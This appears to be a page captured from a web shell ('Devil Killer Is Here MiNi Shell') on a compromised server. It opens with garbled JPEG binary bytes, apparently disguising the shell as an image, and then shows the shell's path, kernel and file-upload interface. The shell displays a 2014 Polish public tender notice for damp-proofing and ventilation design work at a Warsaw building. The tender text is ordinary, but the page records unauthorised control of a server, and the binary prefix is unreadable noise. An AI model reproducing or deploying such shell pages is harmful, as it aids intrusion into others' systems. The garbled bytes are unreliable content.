JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141107/369982-N-2014.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji projektowo -  kosztorysowej na wykonanie izolacji przeciwwilgociowej ścian fundamentowych i posadzek oraz wentylacji grawitacyjnej pomieszczeń piwnicznych w budynku użytkowym przy ul. Wiśniowej 37 w Warszawie.</b><br>
<b>Numer ogłoszenia: 369982 - 2014; data zamieszczenia: 07.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo -  kosztorysowej na wykonanie izolacji przeciwwilgociowej ścian fundamentowych i posadzek oraz wentylacji grawitacyjnej pomieszczeń piwnicznych w budynku użytkowym przy ul. Wiśniowej 37 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji projektowo -  kosztorysowej na wykonanie izolacji przeciwwilgociowej ścian fundamentowych i posadzek oraz wentylacji grawitacyjnej pomieszczeń piwnicznych w budynku użytkowym przy ul. Wiśniowej 37 w Warszawie zgodnie z założeniami projektowymi i kosztorysowymi,  przedstawionymi pkt 3.1.1. SIWZ, stanowiącymi również załącznik nr 3 do Rozdziału III SIWZ - istotnych postanowień umowy.
1.1. Opis przedmiotu zamówienia wg założeń projektowych i kosztorysowych     stanowiących załącznik nr 3 do Rozdziału III SIWZ - istotnych postanowień umowy.
     ZAŁOŻENIA PROJEKTOWE  I  KOSZTORYSOWE. 
Przedmiotem zamówienia jest opracowanie: Dokumentacji projektowej i kosztorysu  na wykonanie izolacji  przeciwwilgociowej ścian fundamentowych i posadzek oraz wentylacji grawitacyjnej  pomieszczeń   piwnicznych   w budynku użytkowym  przy ul. Wiśniowej 37 w Warszawie. 
Podstawowe dane o obiekcie:
-  Kubatura -   4 705   m3
Budynek  wybudowany w technologii tradycyjnej,  ściany murowane z cegły, posiada cztery  kondygnacje naziemne i jedną kondygnację podziemną.  Pomieszczenia na kondygnacjach naziemnych  użytkowane  są jako pomieszczenia biurowe, pomieszczenia piwniczne jako  pomieszczenia gospodarcze , magazynowe. Budynek wyposażony jest w instalację centralnego ogrzewania z sieci miejskiej, instalację elektryczną, wodociągowo - kanalizacyjną Woda ciepła pozyskiwania jest z bojlera elektrycznego zamontowanego                 w pomieszczeniu piwnicznym. 
Do budynku od strony zachodniej przylega budynek użytkowy  jednokondygnacyjny, niepodpiwniczony.  
Budynek znajduje się w Gminnej  Ewidencji Zabytków. 
ZAŁOŻENIA PROJEKTOWE
Informacje i wytyczne szczegółowe: Wykonać inwentaryzację piwnic, przestawić rozwiązania skutecznego zabezpieczenia ścian fundamentowych i piwnic przed wodą gruntową  zgodnie   z obowiązującymi przepisami, uwzględnić wyprowadzenie izolacji pionowej przeciwwilgociowej ścian zewnętrznych do poziomu istniejącego cokołu lastrykowego, przy projektowaniu izolacji przeciwwilgociowej posadzek przewidzieć powiązanie jej z poziomą izolacją ścian zewnętrznych i wewnętrznych nośnych, w zakresie projektu nie przewiduje się izolacji termicznej, określić zakres wykonania izolacji  pionowej i poziomej ścian fundamentowych oraz izolacji poziomej posadzki, sporządzić w skali 1:20 rysunki obrazujące detale rozwiązań napraw elementów konstrukcyjnych, połączeń izolacji, uwzględnić wentylacje grawitacyjną przy ustalaniu zakresu wentylowania pomieszczeń  na poziomie piwnicy, określać kolejność prowadzenia robót, uwzględnić miejsca składowania materiałów, uwzględnić odtworzenie  studzienek piwnicznych,  opaski przy budynku, terenów zielonych z nasadzeniami i  chodnika, przy odtwarzaniu opaski przy budynku uwzględnić posadowienie płyt poza podsypką piaskową na folii budowlanej, dopuszcza się rozebranie ścianek działowych o grubości od 6cm do 12cm  i po wykonaniu izolacji  ich odtworzenie w tych samych miejscach, uwzględnić malowanie ścian i sufitów farbami oddychającymi. Uwzględnić wykonanie studzienek żelbetowych z odwodnieniem do gruntu. 
Zakres zamawianego opracowania:
1. Dokumentacje projektowe muszą zawierać:
    a) Projekt budowlany   wykonania  izolacji  przeciwwilgociowej ścian fundamentowych i 
        posadzek w pomieszczeniach  piwnicznych   oraz wentylacji grawitacyjnej  pomieszczeń   
        piwnicznych .  
    b) Przedmiary robót dla potrzeb sporządzenia kosztorysu ofertowego.
    c) Informację BIOZ
2.  Specyfikacje techniczne wykonania i odbioru robót budowlanych.
3. Kosztorys inwestorski   wykonania izolacji  przeciwwilgociowej ścian fundamentowych
     i  posadzek w pomieszczeniach  piwnicznych.  
4. Inwentaryzację stanu istniejącego obejmującą rzut, przekroje ze szczególnym 
    uwzględnieniem izolacji i elementów mających wpływ na wentylację.  
5. Projekt organizacji robót i zabezpieczenia terenu. 
                    
Forma opracowania dokumentacji projektowych: DOKUMENTACJA  PROJEKTOWA  musi  spełniać wymagania określone w rozporządzeniach: Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie  szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 462 z 2012 r.), oraz Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, nr 1129. Przed przystąpieniem do bezpośrednich prac projektowych, w celu wyboru i akceptacji   przez Zamawiającego, Projektant przedstawi Zamawiającemu propozycje wykonania prac remontowych jak najtańszych z możliwych, spełniających jednocześnie wszystkie warunki techniczne.  Projekt budowlany wykonania  izolacji  przeciwwilgociowej ścian fundamentowych i posadzek w pomieszczeniach  piwnicznych   opracować  należy w 5 egzemplarzach w wersji papierowej oraz w wersji elektronicznej z pełnymi uzgodnieniami. Rysunki detali zostaną wykonane w skali 1:20. Wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD), preferowany jest zapis w formacie                                   z rozszerzeniem pdf. Przedmiar robót dla potrzeb sporządzenia kosztorysu ofertowego należy wykonać w dwóch egzemplarzach  oraz w wersji elektronicznej. Wersja elektroniczna powinna być zapisana na nośniku elektronicznym  (płyta CD), preferowany jest zapis                          w formacie z rozszerzeniem ATH (NORMA).Każdy egzemplarz dokumentacji projektowej powinien być trwale oprawiony. Dokumentacja nie może zawierać żadnych materiałów reklamowych  producentów materiałów budowlanych itp. oraz żadnych reklam.Projektant zobowiązany jest do uzyskania własnym kosztem i staraniem wszelkich niezbędnych  dla prawidłowej realizacji zamówienia, koniecznych do wykonania projektu, materiałów i uzgodnień z jednostkami zewnętrznymi oraz materiałów wyjściowych np. mapy do celów projektowych itp.
Forma opracowania specyfikacji technicznej wykonania i odbioru robót:
SPECYFIKACJA TECHNICZNA wykonania i odbioru robót budowlanych musi być wykonana zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra   Infrastruktury z dnia 2 września 2004 r. w  sprawie  szczegółowego  zakresu  i  formy  dokumentacji  projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego  (tekst jedn. Dz.U. z 2013, nr 1129),  w  2 egz.  oraz  w  wersji elektronicznej, wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD), preferowany jest zapis w formacie z rozszerzeniem doc.
ZAŁOŻENIA KOSZTORYSOWE
Forma opracowania kosztorysów inwestorskich: KOSZTORYSY INWESTORSKIE należy wykonać w dwóch egzemplarzach oraz w wersji elektronicznej, (za pomocą programu kosztorysowego NORMA na płycie CD) z rozszerzeniem ATH. Kosztorysy inwestorskie muszą być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004r.poz. 1389). Kosztorysy inwestorskie wykonać na podstawie sporządzonego przedmiaru stanowiącego część dokumentacji projektowej, metodą szczegółową w oparciu o kosztorysowe normy nakładów rzeczowych określone w katalogach KNR wydanych przez Ministra Gospodarki Przestrzennej i Budownictwa oraz norm y zakładowe ZGN, a w przypadku braku w nich odpowiednich nakładów rzeczowych należy zastosować katalogi  KNR-W wydane przez WACETOB. W przypadku braku odpowiednich pozycji również w tych katalogach  (lub możliwości zastosowania analogii do nich) można wykorzystać inne dostępne na rynku  katalogi norm albo wykonać kalkulację indywidualną po zaakceptowaniu przez Zamawiającego tj. inspektora nadzoru i Kierownika DOM.  W kalkulacji szczegółowej cen jednostkowych należy przyjąć  następujące ceny  czynników  produkcji oraz wskaźniki narzutów:
1.	stawkę robocizny kosztorysowej R - jako średnią dla miasta Warszawy stawkę za jedną roboczogodzinę w branży budowlanej publikowaną w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej.
2.	ceny jednostkowe materiałów M - jako średnie wraz z kosztami zakupu ceny materiałów, publikowane w wydawnictwach SEKOCENBUD Informacjach o cenach czynników produkcji RMS (IMB) wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej, oraz ceny materiałów budowlanych opracowanych  przez wydawnictwo  SEKOCENBUD na zamówienie ZGN Mokotów.
3.	ceny jednostkowe pracy sprzętu S - jako średnie dla miasta Warszawy ceny pracy sprzętu, publikowane w wydawnictwach SEKOCENBUD BCR informacja o cenach czynników  produkcji RMS lub IRS wydanie aktualne dla daty sporządzenia dokumentacji  projektowej i kosztorysowej,
4.	wskaźnik narzutu kosztów pośrednich Wkp - jako średni dla miasta Warszawy wskaźnik w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Koszty pośrednie  Kp należy liczyć od (R + S),.
5.	wskaźnik narzutu zysku Wz - jako średni dla miasta Warszawy wskaźnik           w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Zysk Z należy  liczyć od (R+S+Kp),
6.	Kosztorysy oraz przedmiary robót powinny obejmować pełen zakres robót niezbędny do realizacji zamówienia.
7.	Do kosztorysów inwestorskich należy dołączyć: zbiorcze zestawienie wartości cen materiałów wraz z kosztami zakupów, zestawienie wartości cen pracy sprzętu bez narzutów i zestawienie wartości robocizny bez narzutów.
 Każdy egzemplarz kosztorysu inwestorskiego powinien być trwale oprawiony.
      1.2. Budynek jest administrowany przez ZGN Mokotów i znajduje się na    
 terenie DOM Madalińskiego, ul. Wiśniowa 35, Warszawa.
2.  Szczegółowe określenie zakresu prac projektowo-kosztorysowych, o których mowa 
         w pkt 3.1. siwz zawierają założenia projektowe i kosztorysowe, stanowiące 
         załącznik nr 3 do  III Rozdziału SIWZ - istotnych postanowień umowy. 
              Przy opracowaniu projektu należy dążyć do minimalizacji kosztów robót 
              wykonanych na podstawie projektu.    
3. Jednostka projektowa zobowiązana jest do pełnienia bezpłatnie nadzoru autorskiego zgodnie z obowiązującymi w tym zakresie przepisami prawa w czasie wykonywania robót na podstawie tej dokumentacji. 
4. Wykonawca jest zobowiązany do przeniesienia praw autorskich na Zamawiającego.
5. Czynności, o których mowa w pkt. 3.1. - 3.2. specyfikacji mają być wykonane zgodnie z:
       5.1. warunkami wynikającymi z przepisów technicznych i Prawa Budowlanego, 
       5.2. wymogami wynikającymi z Polskich Norm, w sposób czytelny i jednoznaczny z podaniem legendy indywidualnych oznaczeń graficznych,
       5.3. zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
       5.4. założeniami projektowymi i kosztorysowymi do wykonania dokumentacji   
                  projektowo - kosztorysowej, stanowiącymi załącznik nr 3 do III Rozdziału
                  specyfikacji istotnych warunków zamówienia - istotnych postanowień umowy,
       5.5. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia,
       5.6.  postanowieniami ustawy Prawo zamówień publicznych. 
6.	Kosztorys oraz przedmiar  robót powinien obejmować pełen zakres robót 
             niezbędny  do realizacji zamówienia. 

7.W przypadku wystąpienia wad ukrytych w dokumentacji, których nie ujawniono 
             w  czasie jej odbioru, Jednostka Projektowa zobowiązana będzie nieodpłatnie 
             do naniesienia poprawek i uzupełnień w terminie 3-ch dni od daty 
             zawiadomienia.
                                                                                                
8.Wykonawca, przy realizacji zamówienia, zobowiązany jest do uzyskania dostępu 
             do pomieszczeń we własnym zakresie.

9. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z  późn. zm.).

10. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią Rozdział III do  specyfikacji.

       10.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                     umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                     okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                      lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                      możliwość zmiany umowy w szczególności w następujących przypadkach:
        a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
        umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
        b) ograniczenia środków budżetowych na realizację Przedmiotu 
        umowy;
        c) zmiany zakresu rzeczowego i finansowego;
                     d)  zmiany osób uczestniczących w realizacji Przedmiotu  umowy;
               e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
               zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
               nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
               koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
               przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
               cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
               albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
               Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
               Ustawy pzp, w celu wykazania spełniania warunków udziału w 
               postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
               obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
               lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
               wymagany w trakcie postępowania o udzielenie zamówienia będącego 
               przedmiotem zamówienia;
                      f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                      wydłużających/wykraczających poza ustawowe terminy procedur 
                      administracyjnych oraz innych terminów spraw urzędowych, mających 
                      wpływ na termin realizacji przedmiotu umowy.

      10.2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod 
                     rygorem nieważności.

      10.3. Wynagrodzenie ostateczne - ryczałt - za wykonany pełen zakres prac - 
                     będzie obejmować łącznie wynagrodzenie podstawowe, podatek VAT oraz 
                     uzyskane przez Wykonawcę własnym kosztem i staraniem wszelkie 
                     niezbędne materiały, uzgodnienia.
11. Wymagania dotyczące gwarancji : 
          Zamawiający wymaga udzielenia gwarancji na wykonaną dokumentację 
          projektową i kosztorysową do czasu wygaśnięcia odpowiedzialności Wykonawcy 
          robót z tytułu gwarancji i rękojmi na roboty wykonane na podstawie opracowanej 
          dokumentacji. Warunki gwarancji zawierają Istotne postanowienia umowy  
          stanowiące Rozdział III specyfikacji istotnych warunków zamówienia.    
 
12. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania
           zamówienia. 
13. Klasyfikacja wg CPV:      
           Kod CPV :  71320000-7 - usługi inżynieryjne  w zakresie projektowania 
14. Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających
     stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których 
     mowa w art. 67 ust. 1 pkt  6 ustawy zamówień z dnia 29 stycznia 2004r. Prawo 
     zamówień publicznych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających
     stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których 
     mowa w art. 67 ust. 1 pkt  6 ustawy zamówień z dnia 29 stycznia 2004r. Prawo 
     zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
    
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
    
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:

1.1.	Ad. wiedza i doświadczenie:
             Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
             realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
             w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
             jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
             wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
             wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
             projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia,  o 
             wartości nie mniejszej niż 5.000,00 zł brutto każda. 
                           Spełnienie w/w  warunku Zamawiający oceniał będzie na podstawie 
                           załączonego do oferty wykazu wykonanych głównych usług, określonych 
                           w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 
                           do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. 
                           SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                           sposób należyty lub są wykonywane należycie.1.2. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 1 w/w ustawy Pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 7 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3., 9.4. siwz i/lub 9.7. SIWZ.

1.3. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art.   
            24 ust. 2 pkt. 5 w/w ustawy Pzp z postępowania  zostanie dokonana na 
            podstawie złożenia przez Wykonawcę listy podmiotów należących do tej 
            samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp 
            lub informacji o braku przynależności do grupy kapitałowej - wzór druku 
            stanowi załącznik nr 8 do SIWZ.

      2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

